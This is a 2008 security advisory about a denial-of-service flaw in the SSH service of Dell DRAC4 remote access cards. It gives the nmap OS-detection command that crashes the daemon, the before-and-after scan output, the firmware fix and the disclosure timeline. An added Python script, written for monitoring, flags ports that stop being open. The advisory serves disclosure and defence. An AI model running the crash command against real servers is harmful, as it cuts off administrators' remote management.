Subject: [NEWS] SSH service at Dell DRAC4 Denial of Service (Mocana)
Date: 25 Jan 2008 19:01:40 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
  SSH service at Dell DRAC4 Denial of Service (Mocana)
------------------------------------------------------------------------


SUMMARY

Dell Remote Access Card 4 (DRAC4) allows customers to effectively manage 
servers in remote locations where no administrative IT staff exists. It 
provides lights out management with continuous video that provides a 
graphical console regardless of the server's state and requires no 
operating system services or drivers. Virtual media support provides the 
server access to networked CD, floppy, and USB drives for server 
installation and updates (origin: Dell USA). The remote management is 
possible e.g. via web interface or via the provided integrated SSH daemon 
(running at port 22/TCP) based on Mocana SSH.

A vulnerability in the SSH server on the DELL DRAC4 allows remote 
attackers to cause it to crash by using nmap against it.

DETAILS

A remote Denial of Service of the integrated SSH daemon is possible with 
nmap-4.03-3 from Debian unstable, which is also shipped in Ubuntu Dapper. 
Please note that this vulnerability cannot be reproduced with every nmap 
version, e.g. nmap-4.20 did not trigger it. After such a port scan, the SSH 
port is unavailable and can only be brought back by the Dell utility 
"racadm", which causes a hard reboot of the whole system.

As there is another issue when the DRAC4 virtual drives are enabled, a 
second reboot needs to be performed manually; otherwise a SuSE Linux 
Enterprise Server 10 (SLES 10), with or without Service Pack 1 (SP1), will 
not boot up correctly and will end with lots of segmentation faults, I/O 
errors and so on. Please note that the remote Denial of Service does not 
depend on the operating system used on the server.

Analysis:
There is NO exploitation which would allow unauthenticated remote 
attackers to gain root access. An affected machine has at least an 
unavailable SSH port at the DRAC4; the web interface keeps working, and in 
order to get SSH access to the DRAC4 back, one or multiple reboots are 
necessary.

As the provided feature to access the DRAC4 by SSH is very useful and 
enabled by default, it is easy to use this vulnerability against exposed 
machines for a remote Denial of Service.

Presumably any "Dell Remote Access Controller 4/P (DRAC 4/P)" including 
"Firmware Version 1.50 (Build 02.16)" is affected by this vulnerability. 
At least, the problem is reproducible with version 1.50 (Build 02.16).

Reproducibility:
Further information regarding the use of nmap and the port scan is below. 
A normal port scan of the management IPv4 address of the DRAC4 should look 
like this (the output below is slightly truncated for better readability):
$ nmap -sV [Management IPv4 address of DRAC4]

Starting Nmap 4.20 ( http://insecure.org ) at 2007-07-09 14:54 CEST
Interesting ports on xxx.xxx.xxx.xxx:
Not shown: 1693 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      Mocanada embedded SSH (protocol 2.0)
80/tcp   open  http     Dell Embedded Remote Access card webserver 1.0
443/tcp  open  ssl/http Dell Remote Access Controller http interface 2.0
5900/tcp open  vnc?
Service Info: Devices: terminal server, remote management

Nmap finished: 1 IP address (1 host up) scanned in 21.559 seconds
$

To bring the SSH daemon running at the DRAC4 down, the following command 
can be used in combination with the already described nmap version:

$ nmap -O [Management IPv4 address of DRAC4]
Starting Nmap 4.03 ( http://www.insecure.org/nmap/ ) at 2007-07-09 14:55 CEST
Insufficient responses for TCP sequencing (0), OS detection may be less accurate
Insufficient responses for TCP sequencing (0), OS detection may be less accurate
Insufficient responses for TCP sequencing (0), OS detection may be less accurate
Interesting ports on xxx.xxx.xxx.xxx:
(The 1670 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
443/tcp  open  https
5900/tcp open  vnc
No exact OS matches for host (If you know what OS is running on it, see 
http://www.insecure.org/cgi-bin/nmap-submit.cgi).

Nmap finished: 1 IP address (1 host up) scanned in 65.943 seconds
$

Now the SSH port is unavailable: an SSH connection attempt, e.g. with the 
OpenSSH client, will time out, and another port scan shows more details:

$ nmap -sV [Management IPv4 address of DRAC4]

Starting Nmap 4.20 ( http://insecure.org ) at 2007-07-09 14:56 CEST
Interesting ports on xxx.xxx.xxx.xxx:
Not shown: 1693 closed ports
PORT     STATE    SERVICE  VERSION
22/tcp   filtered ssh
80/tcp   open     http     Dell Embedded Remote Access card webserver 1.0
443/tcp  open     ssl/http Dell Remote Access Controller http interface 2.0
5900/tcp open     vnc?
Service Info: Devices: terminal server, remote management

Nmap finished: 1 IP address (1 host up) scanned in 21.378 seconds
$

In order to get SSH access back, "racadm racreset" has to be executed, 
maybe further parameters are needed. More information regarding this can 
be taken from the Dell Remote Access Controller Racadm User's Guide.
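The symptom shown in the two scans above is port 22 changing from "open" to "filtered" while the web and VNC ports stay up. The following is an added example written for this page, not code from the advisory or from Dell: it parses nmap's normal output and reports ports that were open in a baseline scan but are no longer open in a later one, so a monitoring job for management interfaces can flag a wedged SSH daemon. The two listings embedded below are the advisory's own scan output, with its address placeholder kept as-is.

```python
"""Diff two nmap port listings of a management interface and report ports
whose state regressed (e.g. open -> filtered).

Added example, not part of the advisory or of any Dell tooling. The two
scan listings below are copied from the advisory's own nmap output."""
import re
from typing import Dict, List, Tuple

# Matches nmap's normal-output port lines, e.g. "22/tcp   filtered ssh" or
# "443/tcp  open     ssl/http Dell ... 2.0". Header and summary lines
# ("PORT  STATE ...", "Not shown: ...") do not start with a digit and are skipped.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_nmap_ports(text: str) -> Dict[str, str]:
    """Return {'port/proto': state} for every port line in an nmap listing."""
    ports: Dict[str, str] = {}
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            ports[f"{m.group(1)}/{m.group(2)}"] = m.group(3)
    return ports


def regressions(before: Dict[str, str], after: Dict[str, str]) -> List[Tuple[str, str]]:
    """Ports that were open in the baseline and are no longer open afterwards.

    A port absent from the later listing is treated as 'closed', which is the
    state nmap folds into its 'Not shown: N closed ports' summary line."""
    return sorted(
        (port, after.get(port, "closed"))
        for port, state in before.items()
        if state == "open" and after.get(port, "closed") != "open"
    )


# Baseline: the advisory's normal scan of the DRAC4 before the nmap -O run.
BASELINE_SCAN = """\
Interesting ports on xxx.xxx.xxx.xxx:
Not shown: 1693 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      Mocanada embedded SSH (protocol 2.0)
80/tcp   open  http     Dell Embedded Remote Access card webserver 1.0
443/tcp  open  ssl/http Dell Remote Access Controller http interface 2.0
5900/tcp open  vnc?
"""

# Follow-up: the advisory's scan after the SSH daemon stopped responding.
FOLLOWUP_SCAN = """\
Interesting ports on xxx.xxx.xxx.xxx:
Not shown: 1693 closed ports
PORT     STATE    SERVICE  VERSION
22/tcp   filtered ssh
80/tcp   open     http     Dell Embedded Remote Access card webserver 1.0
443/tcp  open     ssl/http Dell Remote Access Controller http interface 2.0
5900/tcp open     vnc?
"""


def check_drac_scans() -> List[Tuple[str, str]]:
    """Compare the advisory's two listings; returns [('22/tcp', 'filtered')]."""
    return regressions(parse_nmap_ports(BASELINE_SCAN), parse_nmap_ports(FOLLOWUP_SCAN))


if __name__ == "__main__":
    for port, state in check_drac_scans():
        print(f"{port}: was open, now {state}; management SSH unreachable, "
              "a reset via racadm may be required")
```

In practice the baseline would be taken once after provisioning and the follow-up from a scheduled scan of the management VLAN; any port that drops out of "open" on a DRAC is worth an alert, because, as the advisory notes, only a hard reset brings the SSH service back.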

Solution:
On October 31, 2007 the "Firmware Version 1.60 (Build 10.04)" for the "Dell 
Remote Access Controller 4" (DRAC 4/I and DRAC 4/P) was released to solve 
this vulnerability. An upgrade to this new version is highly recommended, 
but the whole DRAC4 configuration and settings have to be saved beforehand, 
as a firmware update causes a loss of all DRAC4-specific settings. And for 
us, multiple firmware updates (EPROM flashings) failed during the upgrade; 
the only working one was the offline update using two floppy disks.

In the README file ftp://ftp.us.dell.com/sysman/readme_160_A00.txt, the 
correction of this issue is mentioned as "Added fix for Remote Denial of 
Service for SSH service", but without reference to this advisory.

CVE Information:
CVE-2007-4360 was assigned on August 15, 2007:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4360

Disclosure Timeline:
2007-07-09 Initial vendor notification
2007-07-11 Initial vendor response
2007-07-16 Vendor communicated escalation to engineering
2007-07-23 Vendor communicated the reproducibility
2007-08-03 Vendor communicated the working for a solution
2007-08-13 Vendor communicated an unknown timeframe
2007-08-13 Coordinated public disclosure
2007-10-31 Vendor released firmware update version 1.60
2007-11-20 Vendor officially announced the new firmware
2008-01-10 Verified the new firmware for reproducibility
2008-01-18 Coordinated public advisory update


ADDITIONAL INFORMATION

The information has been provided by Robert Scheck <scheck@etes.de>.
The original article can be found at: http://www.etes.de
